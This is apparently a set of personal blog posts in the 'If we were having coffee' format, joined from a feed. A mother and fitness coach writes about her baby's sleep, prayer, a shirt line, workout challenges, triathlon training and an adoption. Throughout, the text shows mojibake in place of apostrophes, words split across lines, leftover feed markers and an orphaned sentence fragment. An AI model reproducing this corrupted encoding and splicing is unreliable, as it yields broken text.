I know itâ€
s Wednesday and normally I do my coffee dates on Saturdays, but I missed y’all and since I am up bright and early this morning, I thought I would pour myself a cup of Joe and chat. So pull up a comfy chair, warm blanket, big old mug of coffee and please join me.

If we were having coffee this morning, I would tell you how baby girl has been a pretty decent, but not perfect, sleeper.
All last week she slept from 8:30-5am. This week she’s slept ’till 2am. When she wakes up, I feed her and she goes right back down…but I donâ€
t. I have had a pretty rough time falling back asleep and when that happens my mind starts racing, I become super OCD and I want to clean and re-organize everything.
Which leads me to my next point, I seriously want to get rid of so many things and start OVER! Have you ever felt like you have so much clutter in your house and you donâ€
t know how to get rid of it? Well, I have more often than not. So whatâ€
s a girl to do at 2am but pin every dream house in sight… this is not healthy! Then I get overwhelmed with other things, like how I need to organize my pictures on my computer and start working on Christmas gift lists. It turns into this nasty cycle of overwhelming thoughts, but then I take a deep breath in and PRAY!
—
If we were having coffee this morning, I would tell you that prayer is something I am working on.
Yes, I pray daily and I pray often, but I donâ€
t pray with others enough. I want to pray with my husband more. I want to pray with my friends more. I want to pray with my family more. Not because it makes me a holier “better†person (because believe me I am not), but because I think when you pray with one another it brings you closer together and to God. I miss that.

If were were having coffee this morning, I would tell you that the Refresh Attire line is going great!
I am so blessed by all that have purchased shirts and canâ€
t wait to come out with more designs. You have one more week to put in you pre-orders.

If were having coffee this morning, I would tell you that I am getting pumped about this year’s HOLIDAY SHRED (sign ups start on FRIDAY November 1st).
So many great workouts, meals and such a fun community! This year, I am offering a way to be part of something bigger and I canâ€
t wait to share it with you all!
—
If were having coffee this morning, I would tell you that I am relived that my Triathlon training is over!
I loved it, but now I can focus on other things and not worry about getting in a swim, ride, run and strength training every week. I do want to do another one someday, but I think I will wait until RJ is one. I am planning on doing some running races soon, but those only require me to run as it’s a lot less stressful for me.
—
If we were having coffee this morning, I would tell you that I am getting super excited about the Holiday season with family.
This will be RJâ€
s first Christmas and I canâ€
t wait to make it special for her. The biggest challenge is not get wrapped up in the hustle and bustle. I am trying to think of ways to slow down and really enjoy the season. Any ideas?

If were were having coffee this morning, I would tell you that I have been busy in the kitchen with my Itâ€
s All Good 365 Challenge!
Last week I made Gwyneth’s Korean Tacos and Hubby loved them! This week I am going to make her Fig Millet Muffins and a Herbed Chicken recipe. I havenâ€
t been making 4 recipes a week like I planned, but I will take what I can get.

If we were having coffee this morning, I would tell you that you are beautiful!
Stop comparing yourself to others. Stop trying to be super women and just be YOU! (I’m preaching to myself here too.) I think so many times we try and look for the next best thing and forget that we are perfect just the way we are. Yes, we have growth areas, but God created us for a reason and for a purpose. Stop trying to be someone you are not and SMILE ’cause He loves you more than you could ever imagine with your imperfections and all.
]]>If we were having coffee this morning, I would tell you that the “groove†has started.
I finally have got in some kind of rhythm of being my own boss. The first couple weeks I was working about 80+ hours a week and I knew that wasnâ€
t healthy. Setting healthy boundaries is so important. I want to make sure that my priorities are set and donâ€
t get thrown off. God, family / friends and then work. My system is definitely not perfect, but progress is happening. Making time to have friends over for dinner, walks to the park and even a little day trip to the beach.

If we were having coffee this morning, I would tell you that I recently starting watching the show The New Girl.
Itâ€
s on Netflix and I am kind of addicted. Just needed a new ‘non-thinking’ show just to laugh… job done. Itâ€
s witty and cute. I just canâ€
t stop watching.

If we were having coffee this morning I would tell you that the first week of Tri Training went well.
I got in five GPP workouts, five miles of running, 24 miles on the bike and 30 minutes of swimming. I need to get in one day of yoga and one more run. I want to challenge myself a bit and see what I can do. Yes, my first goal is to finish, but I want to get some time goals down.

If we were having coffee right now, I would tell you that I only have ONE MORE WEEK of the 2013 Summer Detox Challenge!
Itâ€
s been hard but folks are starting to reap the benefits. I am excited to have a little wine and coffee on the 26th, but I am loving getting creative in the kitchen.

If we were having coffee right now, I would tell you that I am getting SO EXCITED about the INFLUENCE CONFERENCE coming up in September and you should GO!
Itâ€
s going to be so amazing getting encouraged and empowered by so many amazing Christian women!

If we were having coffee right now, I would invite you over for dinner and we would enjoy all kinds of clean eats, drinks and enjoy these summer nights together.
]]>If we were having coffee this morning I would tell you that I am looking forward to the 21 Summer Detox with 50 other amazing women! I will miss coffee and wine, but after the summer I have had this couldnâ€
t have come at a better time.
If were having coffee this morning I would tell you that we are finished with every last detail for the adoption, and are just waiting to sign one last paper! WE have big plans to finish the nursery (newest additions below) this weekend and praying even more over this house and that room. Godâ€
s got big plans and I canâ€
t wait to see them unfold. Even if we never see them unfold completely, we will still trust and we will still choose joy.

t wait to start training.
If we were having coffee this morning I would tell you that next week I will be participating in the GPP RX+Week! 5 days of two-a-day workouts (11 total workouts), I know I am crazy…I CANâ€
T wait! Itâ€
s going to be awesome to pair this with the detox!
If we were having coffee this morning I would tell you that I am super excited about what the Lord is doing with NHS Fitness! Itâ€
s been such an amazing summer watching lives be transformed! So many people finding optimal health and taking back their lives through the Summer Shredâ€
s. If you missed out, donâ€
t worry I have an opportunity for you too coming soon!
If we were having coffee this morning I would tell you that I didnâ€
t get the RunWestin job. I know, kind of a let down. I found out Thursday, but the best part is I will still be working with them on the social media level which is awesome! I also know that everything happens for a reason and I really had to preach to myself and CHOOSE JOY this week. What an amazing opportunity as well as an honor to even make it to the top 3 out of over 1,000 applicants. Donâ€
t get me wrong I was bummed, but then I was excited because when one door closes there are a lot more to be open!
